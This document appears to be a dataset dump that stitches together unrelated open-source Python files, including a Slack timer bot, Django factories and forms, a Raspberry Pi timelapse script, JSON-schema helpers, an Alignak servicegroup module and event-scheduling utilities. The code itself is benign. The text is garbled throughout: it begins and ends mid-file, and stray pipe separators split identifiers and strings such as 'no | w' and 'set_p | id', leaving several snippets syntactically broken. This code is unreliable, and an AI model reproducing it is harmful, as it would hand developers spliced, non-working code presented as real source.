group_and_project, "*_allow_pushes_access_levels"
)
assert push_access_levels == [Access |
venmo/slouch | example.py | Python | mit | 2,870 | 0.001742 | #!/usr/bin/env python
"""
TimerBot can manage multiple stopwatch-style timers from Slack.
Usage:
timerbot [--start_fmt=<start_fmt>] [--stop_fmt=<stop_fmt>] <slack_token>
timerbot --help
Options:
--start_fmt=<start_fmt> Format string for start responses (given a datetime) [default: {}]
--stop_fmt=<stop_fmt> Format string for start responses (given a timedelta) [default: {}]
--help Show this screen.
"""
import datetime
import logging
import sys
from docopt import docopt
from slouch import Bot, help
# You might also be interested in this bot's tests:
# https://github.com/venmo/slouch/blob/master/tests/test_example_bot.py
class TimerBot(Bot):
def prepare_bot(self, config):
# It's fine to start implementation-specific state directly on the bot.
self.start_fmt = config['start_fmt']
self.stop_fmt = config['stop_fmt']
self.timers = {}
# This is optional; it provides a help command that lists and gives details on other commands.
TimerBot.command(help)
@TimerBot.command
def start(opts, bot, event):
"""Usage: start [--name=<name>]
Start a timer.
Without _name_, start the default timer.
To run more than one timer at once, pass _name_ to start and stop.
"""
name = opts['--name']
now = datetime.datetime.now()
bot.timers[name] = no | w
return bot.start_fmt.format(now)
@TimerBot.command
def stop(opts, bot, event):
"" | "Usage: stop [--name=<name>] [--notify=<slack_username>]
Stop a timer.
_name_ works the same as for `start`.
If given _slack_username_, reply with an at-mention to the given user.
"""
name = opts['--name']
slack_username = opts['--notify']
now = datetime.datetime.now()
delta = now - bot.timers.pop(name)
response = bot.stop_fmt.format(delta)
if slack_username:
mention = ''
# The slack api (provided by https://github.com/os/slacker) is available on all bots.
users = bot.slack.users.list().body['members']
for user in users:
if user['name'] == slack_username:
mention = "<@%s>" % user['id']
break
response = "%s: %s" % (mention, response)
return response
if __name__ == '__main__':
args = docopt(__doc__)
slack_token = args['<slack_token>']
config = {
'start_fmt': args['--start_fmt'],
'stop_fmt': args['--stop_fmt'],
}
log = logging.getLogger('slouch')
log.setLevel(logging.DEBUG)
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setFormatter(logging.Formatter(
fmt=('%(asctime)s %(name)s'
' (%(filename)s:%(lineno)s)'
' %(levelname)s:'
' %(message)s'),
datefmt='%H:%M:%S'))
log.addHandler(console_handler)
bot = TimerBot(slack_token, config)
bot.run_forever()
|
anhstudios/swganh | data/scripts/templates/object/static/structure/general/shared_fountain_generic_style_1.py | Python | mit | 462 | 0.047619 | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swg | py.object import *
def create(kerne | l):
result = Static()
result.template = "object/static/structure/general/shared_fountain_generic_style_1.iff"
result.attribute_template_id = -1
result.stfName("obj_n","unknown_object")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result |
toladata/TolaActivity | factories/django_models.py | Python | apache-2.0 | 848 | 0 | from django.template.defaultfilters import slugify
from factory import DjangoModelFactory, lazy_attribute
from workflow.models import ROLE_PROGRAM_ADMIN
class User(DjangoModelFactory):
class Meta:
model = 'auth.User'
| django_get_or_create = ('username',)
| first_name = 'Thom'
last_name = 'Yorke'
username = lazy_attribute(lambda o: slugify(o.first_name + '.' +
o.last_name))
email = lazy_attribute(lambda o: o.username + "@testenv.com")
class Group(DjangoModelFactory):
class Meta:
model = 'auth.Group'
django_get_or_create = ('name',)
name = ROLE_PROGRAM_ADMIN
class Site(DjangoModelFactory):
class Meta:
model = 'sites.Site'
django_get_or_create = ('name',)
name = 'toladata.io'
domain = 'toladata.io'
|
eike-welk/clair | src/clairweb/clairweb/wsgi.py | Python | gpl-3.0 | 394 | 0 | """
WSGI config for | clairweb project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "clairweb.settings")
application | = get_wsgi_application()
|
alanmcna/timelapsecontroller | focusandshoot.py | Python | gpl-2.0 | 2,409 | 0.034454 | import sqlite3
import RPi.GPIO as GPIO
import os, sys, time
conn = sqlite3.connect( os.path.join( os.path.dirname(os.path.realpath(sys.argv[0])), 'db/timelapsecontroller.db'))
conn.row_factory = sqlite3.Row
sleep=2
def set_pid(pid=None):
c = conn.cursor()
try:
# Update the DB counter
c.execute("UPDATE timelapseconfig SET pid=?", ( int(pid), ) )
except sqlite3.Error as e:
print "An error occurred:", e.args[0]
# Save (commit) the changes
conn.commit()
print "Set the PID to be ", pid
def wakeup():
#Using Port 6 as Ground
#Port 7 is Live
#Sets up GPIO Pin 7 to Output
GPIO.setup(7, GPIO.OUT)
#Turns on GPIO Pin 7 - Enables Power to Pin 7 for focus / wake up.
GPIO.output(7, True)
time.sleep(2)
GPIO.output(7, False)
def running():
c = conn.cursor()
try:
c.execute('SELECT * FROM timelapseconfig')
config = c.fetchone()
if config['running'] and config['count'] < config['target']:
print "Running ({} of {})".format(config['count'], config['target'])
return True
except sqlite3.Error as e:
print "An error occurred:", e.args[0]
return False
def getsleep():
c = conn.cursor()
try:
c.execute('SELECT * FROM timelapseconfig')
config = c.fetchone()
return config['sleep']
except sqlite3.Error as e:
print "An error occurred:", e.args[0]
def shoot():
#Sets up GPIO Pin 11 to Output
GPIO.setup(11, GPIO.OUT)
#Pause for 2 Seconds (Hold Fire for 2 Seconds)
#Turns on GPIO Pin 11 - Enables Power to Pin 11 to Shoot
GPIO.output(11, True)
time.sleep(2)
GPIO.output(11, False)
def updatecounter():
c = conn.cursor()
try:
# Update the DB counter
c.execute("UPDATE timelapseconfig set count=count+1")
except sqlite3.Error as e:
print "An error occurred:", e.args[0]
# Save (commit) the changes
conn.commit()
print "Incrementing counter"
if __name__ == "__main__":
#Set the B | oard Mode
GPIO.setmode(GPIO.BOARD)
#Write (set) PID to config
set_pid(os.getpid())
while True:
if ( running() ):
wakeup()
shoot()
updatecounter()
#Pause for configured # of seconds (default 2)
sleep = getsleep()
print "Sleeping for %r seconds.." % sleep
time.sleep(sleep)
#Write (unset) PID to config
set_p | id(None)
# close the DB conn
conn.close()
#Stops the script and End of script clean up of the GPIO Port
GPIO.cleanup()
|
dalou/django-extended | django_extended/fields/price.py | Python | bsd-3-clause | 873 | 0.003436 | # -*- coding: utf-8 -*-
from django.db import models |
from django import forms
from django.utils.text import capfirst
fr | om ..forms import PriceField as PriceFormField, PriceInput
class PriceField(models.DecimalField):
"""
A text field made to accept hexadecimal color value (#FFFFFF)
with a color picker widget.
"""
def __init__(self, *args, **kwargs):
kwargs['decimal_places'] = kwargs.get('decimal_places', 2)
kwargs['max_digits'] = kwargs.get('max_digits', 21)
super(PriceField, self).__init__(*args, **kwargs)
def formfield(self, **kwargs):
kwargs['form_class'] = PriceFormField
return super(PriceField, self).formfield(**kwargs)
try:
from south.modelsinspector import add_introspection_rules
add_introspection_rules([], ["^django_extended\.fields\.PriceField"])
except ImportError:
pass |
miteshvp/fabric8-analytics-worker | f8a_worker/schemas.py | Python | gpl-3.0 | 15,518 | 0.00116 | """U | tilities for accessing and working with JSON schemas."""
import abc
from collections import namedtuple, OrderedDict
from functools import wraps
import importlib
import json
import os.path
import pkgutil
import jsl
import jsonschema
def added_in(role):
"""Pr | ovide helper for schema fields added in a particular version.
Example:
with added_in(ROLE_v2_0_0) as since_v2_0:
since_v2_0.new_field_name = ...
"""
return jsl.Scope(lambda v: v >= role)
def removed_in(role):
"""Provide helper for schema fields removed in a particular version.
Example:
with removed_in(ROLE_v2_0_0) as before_v2_0:
before_v2_0.old_field_name = ...
"""
return jsl.Scope(lambda v: v < role)
class JSLWithSchemaAttribute(jsl.Document):
"""JSL schema for name, version, url."""
name = jsl.StringField(required=True, description='Name of the schema',
pattern=r'^[a-zA-Z0-9_]+$')
version = jsl.StringField(required=True, description='Version of the schema',
pattern=r'^[0-9]+-[0-9]+-[0-9]+$')
url = jsl.UriField(required=False, description='Full URL of the schema')
class JSLSchemaBase(jsl.Document):
"""Base class for all schema definitions.
This class serves as a base class for all schema definitions that should
include the `schema` object (with `name`, `version` and optional `url`).
"""
def get_schema(self, role, ordered=True):
"""Override of jsl.Document.get_schema with these changes.
- an explicit *role* argument is required
- the *ordered* parameter defaults to True
"""
schema_as_json = super(JSLSchemaBase, self).get_schema(role, ordered)
# Set schema title based on the definition ID and active role
try:
options = self.Options
definition_id = options.definition_id
except AttributeError as exc:
msg = "Published schema {} missing 'definition_id' option"
raise TypeError(msg.format(type(self).__name__)) from exc
title = "{}-{}".format(definition_id, role)
schema_as_json["title"] = title
return schema_as_json
schema = jsl.DocumentField(JSLWithSchemaAttribute,
description='Information about schema of this document')
class JSLSchemaBaseWithRelease(JSLSchemaBase):
"""JSL schema for release id."""
_release = jsl.StringField(
required=False,
description='Unique release id in form of "ecosystem:package:version"'
)
class SchemaRef(namedtuple("SchemaRef", "name version")):
"""Name and version number for a JSON schema."""
__slots__ = () # 3.4.3 compatibility: prevent __dict__ override
def __str__(self):
"""Represent schema as string."""
return "{} v{}".format(self.name, self.version)
# Define new schema versions based on this one
def _split_version_info(self):
"""Split version info into tuple."""
return tuple(map(int, self.version.split("-")))
def _replace_version_info(self, model, revision, addition):
"""Replace version info."""
version = "-".join(map(str, (model, revision, addition)))
return self._replace(version=version)
def next_addition(self):
"""Bump addition."""
model, revision, addition = self._split_version_info()
return self._replace_version_info(model, revision, addition + 1)
def next_revision(self):
"""Bump revision."""
model, revision, addition = self._split_version_info()
return self._replace_version_info(model, revision + 1, addition)
def next_model(self):
"""Bump model."""
model, revision, addition = self._split_version_info()
return self._replace_version_info(model + 1, revision, addition)
class SchemaLookupError(LookupError):
"""Failed to find requested schema in schema library."""
def __init__(self, schema_ref):
"""Initialize object."""
self.schema_ref = schema_ref
def __str__(self):
"""Represent as a string."""
return "Unknown schema: {}".format(self.schema_ref)
class SchemaModuleAttributeError(AttributeError):
"""No such attribute defined."""
def __init__(self, mod, attribute):
"""Initialize object."""
self.mod = mod
self.attribute = attribute
def __str__(self):
"""Represent as a string."""
return "Module {} doesn't define attribute {} necessary for automatic schema load".\
format(self.mod, self.attribute)
class SchemaImportError(ImportError):
"""Failed to import schema from module."""
def __init__(self, mod):
"""Initialize object."""
self.mod = mod
def __str__(self):
"""Represent as a string."""
return "Can't import schema from module {}".format(self.mod)
class AbstractSchemaLibrary(object, metaclass=abc.ABCMeta):
"""Abstract class for schema."""
def load_schema(self, schema_ref):
"""Load and parse specified schema from the library."""
try:
schema_data = self.read_binary_schema(schema_ref)
except Exception as exc:
raise SchemaLookupError(schema_ref) from exc
return json.loads(schema_data.decode("utf-8"), object_pairs_hook=OrderedDict)
@abc.abstractmethod
def read_binary_schema(self, schema_ref):
"""Read raw binary schema from path constructed from given schema ref."""
raise NotImplementedError('read_binary_schema is abstract method')
class SchemaLibrary(AbstractSchemaLibrary):
"""Load named and versioned JSON schemas."""
def __init__(self, schema_dir):
"""Initialize object."""
# Py2 compatibility: use explicit super()
super(SchemaLibrary, self).__init__()
self.schema_dir = schema_dir
self._schema_pattern = os.path.join(schema_dir, "{}-v{}.schema.json")
def read_binary_schema(self, schema_ref):
"""Read raw binary schema from path constructed from given schema ref."""
schema_path = self._schema_pattern.format(*schema_ref)
with open(schema_path, "rb") as schema_file:
return schema_file.read()
class BundledSchemaLibrary(SchemaLibrary):
"""Load named and version JSON schemas bundled with a Python package."""
def __init__(self, schema_dir, base_module):
"""Initialize object."""
# Py2 compatibility: use explicit super()
super(BundledSchemaLibrary, self).__init__(schema_dir)
self.base_module = base_module
def read_binary_schema(self, schema_ref):
"""Read raw binary schema from path constructed from given schema ref."""
schema_path = self._schema_pattern.format(*schema_ref)
return pkgutil.get_data(self.base_module, schema_path)
class BundledDynamicSchemaLibrary(AbstractSchemaLibrary):
"""Load named and version JSON schemas bundled with a Python package."""
def __init__(self, schema_mod_fqn):
"""Initialize object."""
# Py2 compatibility: use explicit super()
super(BundledDynamicSchemaLibrary, self).__init__()
self.schema_mod_fqn = schema_mod_fqn
def read_binary_schema(self, schema_ref):
"""Read raw binary schema from path constructed from given schema ref."""
result_class, role = self.load_schema_class_and_role(schema_ref)
return json.dumps(result_class().get_schema(ordered=True, role=role)).encode('utf-8')
def load_schema_class_and_role(self, schema_ref):
"""Load schema class and role."""
module_fqn = '.'.join([self.schema_mod_fqn, schema_ref.name.replace('-', '_')])
try:
mod = importlib.import_module(module_fqn)
except ImportError as e:
raise SchemaImportError(module_fqn) from e
role_name = 'ROLE_v{}'.format(schema_ref.version).replace('-', '_')
result_class_name = 'THE_SCHEMA'
if not hasattr(mod, role_name):
raise SchemaModuleAttributeError(mod, role_name)
if not hasattr(mod, result_class_name):
raise SchemaModuleAttribu |
mozilla-lockbox/lockbox-extension | test/integration/pages/util/__init__.py | Python | mpl-2.0 | 43 | 0 | """Con | tain utility functions and tools.""" | |
fedjo/thesis | project/aat/forms.py | Python | apache-2.0 | 3,217 | 0.009636 | from django import forms
from aat.models import RecognizerPreTrainedData
class DefaultDetectionForm(forms.Form):
title = "Please specify the directory containing your videos"
#video = forms.FileField(required=True, widget=forms.ClearableFileInput())
video = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control'}),
required=True)
detection = forms.CharField(widget=forms.HiddenInput(),
required=True, initial=False)
recognizer = forms.CharField(widget=forms.HiddenInput(),
required=True, initial=False)
objdetection = forms.CharField(widget=forms.HiddenInput(),
required=True, initial=False)
transcription = forms.CharField(widget=forms.HiddenInput(),
required=True, initial=False)
class ComplexDetectionForm(forms.Form):
CHOICES = [('Yes', 'Yes'),
('No', 'No')]
title = "Please upload your video in zip format"
#video = forms.FileField(required=True, widget=forms.ClearableFileInput())
video = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control'}),
required=True)
detection = forms.CharField(widget=forms.HiddenInput(),
required=True, initial=False)
recognizer = forms.ChoiceField(choices=[('LBPH', 'Local Binary Patterns Histogram'),
('EF', 'Eighen Faces'),
('FF', 'Fisher Faces'),
#('KNN', 'LBPH using K-Nearest Neighbor'),
('false', 'Do not recognize faces')],
widget=forms.Select(attrs={'class': 'form-control '
'select select-primary', 'data-toggle': 'select'}))
faces_database = forms.ModelChoiceField(queryset= RecognizerPreTrainedData.objects.values_list('name', flat=True),
to_field_name='facedb',
empty_label='(Nothing)')
objdetection = forms.Char | Field(widget=forms.HiddenInput(),
required=True, initial=False)
transcription = forms.CharField(widget=forms.HiddenInput(),
required=True, initial=False)
| #iszip = forms.ChoiceField(choices=CHOICES,
# widget=forms.RadioSelect(attrs={'data-toggle': 'radio'}))
scale = forms.FloatField(widget=forms.NumberInput(attrs={'class': 'form-control', 'step': '0.1', 'placeholder': '1.3'}))
neighbors = forms.IntegerField(widget=forms.NumberInput(attrs={'class': 'form-control', 'placeholder': '5'}))
min_x_dimension = forms.IntegerField(widget=forms.NumberInput(attrs={'class': 'form-control', 'placeholder': '10'}))
min_y_dimension = forms.IntegerField(widget=forms.NumberInput(attrs={'class': 'form-control', 'placeholder': '10'}))
bounding_boxes = forms.BooleanField(required=False, initial=True)
# facesdb = forms.FileField(required=False, widget=forms.ClearableFileInput())
|
ddurieux/alignak | alignak/objects/servicegroup.py | Python | agpl-3.0 | 7,989 | 0.000751 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2015: Alignak team, see AUTHORS.txt file for contributors
#
# This file is part of Alignak.
#
# Alignak is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Alignak is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Alignak. If not, see <http://www.gnu.org/licenses/>.
#
#
# This file incorporates work covered by the follo | wing copyright and
# permission notice:
#
# Copyright (C) 2009-2014:
# Hartmut Goebel, h.goebel@goebel-consult.de
# Guillaume Bour, guillaume@bour.cc
# Nicolas Dupeux, nicolas@dupeux.net
# Grégory Starck, g.starck@gmail.com
| # Gerhard Lausser, gerhard.lausser@consol.de
# Sebastien Coavoux, s.coavoux@free.fr
# Christophe Simon, geektophe@gmail.com
# Jean Gabes, naparuba@gmail.com
# Romain Forlot, rforlot@yahoo.com
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
from alignak.property import StringProp, IntegerProp
from alignak.log import logger
from .itemgroup import Itemgroup, Itemgroups
from .service import Service
class Servicegroup(Itemgroup):
id = 1 # zero is always a little bit special... like in database
my_type = 'servicegroup'
properties = Itemgroup.properties.copy()
properties.update({
'id': IntegerProp(default=0, fill_brok=['full_status']),
'servicegroup_name': StringProp(fill_brok=['full_status']),
'alias': StringProp(fill_brok=['full_status']),
'notes': StringProp(default='', fill_brok=['full_status']),
'notes_url': StringProp(default='', fill_brok=['full_status']),
'action_url': StringProp(default='', fill_brok=['full_status']),
})
macros = {
'SERVICEGROUPALIAS': 'alias',
'SERVICEGROUPMEMBERS': 'members',
'SERVICEGROUPNOTES': 'notes',
'SERVICEGROUPNOTESURL': 'notes_url',
'SERVICEGROUPACTIONURL': 'action_url'
}
def get_services(self):
if getattr(self, 'members', None) is not None:
return self.members
else:
return []
def get_name(self):
return self.servicegroup_name
def get_servicegroup_members(self):
if self.has('servicegroup_members'):
return [m.strip() for m in self.servicegroup_members.split(',')]
else:
return []
# We fillfull properties with template ones if need
# Because hostgroup we call may not have it's members
# we call get_hosts_by_explosion on it
def get_services_by_explosion(self, servicegroups):
# First we tag the hg so it will not be explode
# if a son of it already call it
self.already_explode = True
# Now the recursive part
# rec_tag is set to False every HG we explode
# so if True here, it must be a loop in HG
# calls... not GOOD!
if self.rec_tag:
logger.error("[servicegroup::%s] got a loop in servicegroup definition",
self.get_name())
if self.has('members'):
return self.members
else:
return ''
# Ok, not a loop, we tag it and continue
self.rec_tag = True
sg_mbrs = self.get_servicegroup_members()
for sg_mbr in sg_mbrs:
sg = servicegroups.find_by_name(sg_mbr.strip())
if sg is not None:
value = sg.get_services_by_explosion(servicegroups)
if value is not None:
self.add_string_member(value)
if self.has('members'):
return self.members
else:
return ''
class Servicegroups(Itemgroups):
name_property = "servicegroup_name" # is used for finding servicegroup
inner_class = Servicegroup
def linkify(self, hosts, services):
self.linkify_sg_by_srv(hosts, services)
# We just search for each host the id of the host
# and replace the name by the id
# TODO: very slow for hight services, so search with host list,
# not service one
def linkify_sg_by_srv(self, hosts, services):
for sg in self:
mbrs = sg.get_services()
# The new member list, in id
new_mbrs = []
seek = 0
host_name = ''
if len(mbrs) == 1 and mbrs[0] != '':
sg.add_string_unknown_member('%s' % mbrs[0])
for mbr in mbrs:
if seek % 2 == 0:
host_name = mbr.strip()
else:
service_desc = mbr.strip()
find = services.find_srv_by_name_and_hostname(host_name, service_desc)
if find is not None:
new_mbrs.append(find)
else:
host = hosts.find_by_name(host_name)
if not (host and host.is_excluded_for_sdesc(service_desc)):
sg.add_string_unknown_member('%s,%s' % (host_name, service_desc))
elif host:
self.configuration_warnings.append(
'servicegroup %r : %s is excluded from the services of the host %s'
% (sg, service_desc, host_name)
)
seek += 1
# Make members uniq
new_mbrs = list(set(new_mbrs))
# We find the id, we replace the names
sg.replace_members(new_mbrs)
for s in sg.members:
s.servicegroups.append(sg)
# and make this uniq
s.servicegroups = list(set(s.servicegroups))
# Add a service string to a service member
# if the service group do not exist, create it
def add_member(self, cname, sgname):
sg = self.find_by_name(sgname)
# if the id do not exist, create the cg
if sg is None:
sg = Servicegroup({'servicegroup_name': sgname, 'alias': sgname, 'members': cname})
self.add(sg)
else:
sg.add_string_member(cname)
# Use to fill members with contactgroup_members
def explode(self):
# We do not want a same hg to be explode again and again
# so we tag it
for sg in self:
sg.already_explode = False
for sg in self:
if sg.has('servicegroup_members') and not sg.already_explode:
# get_services_by_explosion is a recursive
# function, so we must tag hg so we do not loop
for sg2 in self:
sg2.rec_tag = False
sg.get_services_by_explosion(self)
# We clean the tags
for sg in self:
try:
del sg.rec_tag
except AttributeError:
pass
del sg.already_explode
|
jfisteus/ztreamy | ztreamy/tools/utils.py | Python | gpl-3.0 | 9,124 | 0.001534 | # ztreamy: a framework for publishing semantic events on the Web
# Copyright (C) 2011-2015 Jesus Arias Fisteus
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see
# <http://www.gnu.org/licenses/>.
#
import time
import random
import math
import sys
import logging
import tornado.ioloop
import ztreamy
from ztreamy import ZtreamyException
from ztreamy import events
from ztreamy import logger
class EventPublisher(object):
def __init__(self, event, publishers, add_timestamp=False, ioloop=None):
self.event = event
self.publishers = publishers
self.add_timestamp = add_timestamp
self.finished = False
self.error = False
self._num_pending = 0
self._external_callback = None
self.ioloop = ioloop or tornado.ioloop.IOLoop.instance()
def publish(self):
if self.add_timestamp:
self.event.set_extra_header('X-Float-Timestamp',
(str(self.event.sequence_num) + '/'
+ "%.3f"%time.time()))
self._num_pending = len(self.publishers)
for publisher in self.publishers:
publisher.publish(self.event, self._callback)
def set_external_callback(self, callback):
self._external_callback = callback
def _callback(self, response):
self._num_pending -= 1
if self._num_pending == 0:
self.finished = True
if self._external_callback is not None:
self._external_callback()
if response.error:
self.error = True
logging.error(response.error)
## else:
## logging.info('Event successfully sent to server')
class _FakeResponse(object):
"""Class used from StdoutPublisher to simulate a Tornado HTTP response."""
def __init__(self, error=False):
self.error = error
class StdoutPublisher(object):
"""Simulates the interface of client.EventPublisher to write to stdout.
Useful mainly for sending the serialized events through a pipe to
other processes.
"""
def __init__(self, ioloop=None):
self.ioloop = ioloop or tornado.ioloop.IOLoop.instance()
def publish(self, event, callback=None):
"""Publishes a new event."""
logger.logger.event_published(event)
body = ztreamy.serialize_events([event])
sys.stdout.write(body)
sys.stdout.flush()
if callback is not None:
def new_callback():
callback(_FakeResponse())
self.ioloop.add_callback(new_callback)
def close(self):
"""Closes the event publisher."""
pass
class EventScheduler(object):
def __init__(self, source_id, io_loop, publishers, time_scale,
event_generator, time_generator=None, add_timestamp=False,
initial_delay=2.0):
""" Schedules the events of the given file and sends.
`source_id`: identifier to be set in command events generated
by the scheduler. `io_loop`: instance of the ioloop to use.
`publishers`: list of EventPublisher objects. `time_scale`:
factor to accelerate time (used only when time_distribution is
None.). `time_generator`: if not None, override times in the
events and use the given interator as a source of event fire
times. If None, events are sent according to the timestamps
they have.
"""
self.period = 10.0
self.source_id = source_id
self.time_scale = time_scale
self.publishers = publishers
self.io_loop = io_loop
self.add_timestamp = add_timestamp
self.finished = False
self._pending_events = []
self._event_generator = event_generator
self._time_generator = time_generator
self.initial_delay = initial_delay
self.sched = tornado.ioloop.PeriodicCallback(self._schedule_next_events,
self.period * 1000)
self.sched.start()
self._schedule_first_event()
def _schedule_first_event(self):
self._send_init_event()
event = self._event_generator.next()
self.t0_original = event.time()
self.t0_new = time.time() + 2 + self.initial_delay
self._schedule_event(event)
self._schedule_next_events()
def _schedule_next_events(self):
self._pending_events = [p for p in self._pending_events \
if not p.finished]
if not self.finished:
try:
limit = time.time() + 2 * self.period
while True:
fire_time = self._schedule_event( \
self._event_generator.next())
if fire_time > limit:
break
except StopIteration:
self.finished = True
if len(self._pending_events) > 0:
for event in self._pending_events:
event.set_external_callback(self._check_if_finished)
else:
self._send_closing_event()
elif len(self._pending_events) == 0:
self.sched.stop()
self.io_loop.stop()
def _schedule_event(self, event):
pub = EventPublisher(event, self.publishers,
add_timestamp=self.add_timestamp)
self._pending_events.append(pub)
if self._time_generator is None:
fire_time = (self.t0_new
+ (event.time() - self.t0_original) / self.ti | me_scale)
else:
fire_time = self._time_generator.next()
self.io_loop.add_timeout(fire_t | ime, pub.publish)
return fire_time
def _check_if_finished(self):
self._pending_events = [p for p in self._pending_events \
if not p.finished]
if len(self._pending_events) == 0:
self._send_closing_event()
def _send_closing_event(self):
# time.sleep(0.5)
event = events.Command(self.source_id, 'ztreamy-command',
'Event-Source-Finished')
pub = EventPublisher(event, self.publishers, add_timestamp=False)
self._pending_events.append(pub)
pub.publish()
def _send_init_event(self):
event = events.Command(self.source_id, 'ztreamy-command',
'Event-Source-Started')
pub = EventPublisher(event, self.publishers, add_timestamp=False)
self._pending_events.append(pub)
self.io_loop.add_timeout(time.time() + self.initial_delay, pub.publish)
def exponential_event_scheduler(mean_time, initial_delay=0.0):
last = time.time() + initial_delay
while True:
last += random.expovariate(1.0 / mean_time)
yield last
def constant_event_scheduler(mean_time, initial_delay=0.0):
last = time.time() + initial_delay
while True:
last += mean_time
yield last
def get_scheduler(description, initial_delay=0.0):
pos = description.find('[')
if pos == -1 or description[-1] != ']':
raise ZtreamyException('error in distribution specification',
'event_source params')
distribution = description[:pos].strip()
params = [float(num) for num in description[pos + 1:-1].split(',')]
if distribution == 'exp':
if len(params) != 1:
raise ZtreamyException('exp distribution needs 1 param',
'event_source params')
return exponential_event_scheduler(params[ |
aitoralmeida/geo-lak | LAK_2014/LAK_2014/urls.py | Python | gpl-2.0 | 657 | 0.001522 | # coding: utf-8
from django.conf.urls import patterns, include, url
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', 'LAK_2014.views | .index', name='index'),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.adm | indocs.urls')),
# Uncomment the next line to enable the admin:
# url(r'^admin/', include(admin.site.urls)),
)
urlpatterns += staticfiles_urlpatterns()
handler404 = 'LAK_2014.views.view404'
|
cloudify-cosmo/cloudify-dsl-parser | dsl_parser/interfaces/operation_merger.py | Python | apache-2.0 | 8,610 | 0 | ########
# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
from dsl_parser.interfaces.constants import NO_OP
from dsl_parser.interfaces.utils import (operation_mapping,
merge_schema_and_instance_inputs)
class OperationMerger(object):
@staticmethod
def _create_operation(raw_operation):
if raw_operation is None:
return None
if isinstance(raw_operation, str):
return operation_mapping(
implementation=raw_operation,
inputs={},
executor=None,
max_retries=None,
retry_interval=None
)
if isinstance(raw_operation, dict):
return operation_mapping(
implementation=raw_operation.get('implementation', ''),
inputs=raw_operation.get('inputs', {}),
executor=raw_operation.get('executor', None),
max_retries=raw_operation.get('max_retries', None),
retry_interval=raw_operation.get('retry_interval', None)
)
def merge(self):
raise NotImplementedError('Must be implemented by subclasses')
class NodeTemplateNodeTypeOperationMerger(OperationMerger):
def __init__(self,
overriding_operation,
overridden_operation):
self.node_type_operation = self._create_operation(
overridden_operation)
self.node_template_operation = self._create_operation(
overriding_operation)
def _derive_implementation(self):
merged_operation_implementation = \
self.node_template_operation['implementation']
if not merged_operation_implementation:
# node template does not define an implementation
# this means we want to inherit the implementation
# from the type
merged_operation_implementation = \
self.node_type_operation['implementation']
return merged_operation_implementation
def _derive_inputs(self, merged_operation_implementation):
if merged_operation_implementation == \
self.node_type_operation['implementation']:
# this means the node template inputs should adhere to
# the node type inputs schema (since its the same implementation)
merged_operation_inputs = merge_schema_and_instance_inputs(
schema_inputs=self.node_type_operation['inputs'],
instance_inputs=self.node_template_operation['inputs']
)
else:
# the node template implementation overrides
# the node type implementation. this means
# we take the inputs defined in the node template
merged_operation_inputs = \
self.node_template_operation['inputs']
return merged_operation_inputs
def _derive_executor(self, merged_operation_implementation):
return self._derive_with_impl('executor',
merged_operation_implementation)
def _derive_max_retries(self, merged_operation_implementation):
return self._derive_with_impl('max_retries',
merged_operation_implementation)
def _derive_retry_interval(self, merged_operation_implementation):
return self._derive_with_impl('retry_interval',
merged_operation_implementation)
def _derive_with_impl(self, field_name, merged_operation_implementation):
node_type_operation_value = self.node_type_operation[
field_name]
node_template_operation_value = self.node_template_operation[
field_name]
if merged_operation_implementation != \
self.node_type_operation['implementation']:
# this means the node template operation value will take
# precedence (even if it is None, in which case,
# the default value will apply (plugin for executor, and global
# config for retry params)
return node_template_operation_value
if node_template_operation_value is not None:
# node template operation value is declared
# explicitly, use it
return node_template_operation_value
return node_type_operation_value
def merge(self):
if self.node_type_operation is None:
# the operation is not defined in the type
# should be merged by the node template operation
return self.node_template_operation
if self.node_template_operation is None:
# the operation is not defined in the template
# should be merged by the node type operation
# this will validate that all schema inputs have
# default values
return operation_mapping(
implementation=self.node_type_operation['implementation'],
inputs=merge_schema_and_instance_inputs(
schema_inputs=self.node_type_operation['inputs'],
instance_inputs={}
),
executor=self.node_type_operation['executor'],
